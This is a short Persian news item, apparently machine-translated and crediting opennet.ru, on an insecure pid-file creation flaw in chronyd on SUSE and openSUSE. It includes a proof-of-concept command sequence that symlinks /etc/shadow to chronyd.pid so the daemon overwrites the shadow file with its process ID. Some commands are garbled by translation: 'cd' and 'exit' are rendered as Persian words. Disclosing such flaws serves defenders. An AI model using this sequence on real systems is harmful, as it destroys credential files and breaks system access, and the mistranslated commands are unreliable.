В
این آسیبپذیری ناشی از ایجاد ناامن یک فایل pid است که در مرحلهای ایجاد شد که chrony هنوز امتیازات را بازنشانی نکرده بود و به عنوان روت اجرا میشد. در این مورد، دایرکتوری /run/chrony که فایل pid در آن نوشته شده است، با حقوق 0750 از طریق systemd-tmpfiles یا زمانی که chronyd در ارتباط با کاربر و گروه "chrony" راه اندازی شد، ایجاد شد. بنابراین، اگر به کاربر chrony دسترسی دارید، میتوانید فایل pid /run/chrony/chronyd.pid را با یک پیوند نمادین جایگزین کنید. یک پیوند نمادین می تواند به هر فایل سیستمی اشاره کند که هنگام راه اندازی chronyd بازنویسی می شود.
root# systemctl stop chronyd.service
root# sudo -u chrony /bin/bash
chrony$ سی دی /run/chrony
chrony$ ln -s /etc/shadow chronyd.pid
chrony$ خروج
root# /usr/sbin/chronyd -n
^C
# به جای محتویات /etc/shadow، شناسه فرآیند chronyd ذخیره خواهد شد
root# cat /etc/shadow
15287
آسیب پذیری
مشکل SUSE و openSUSE
منبع: opennet.ru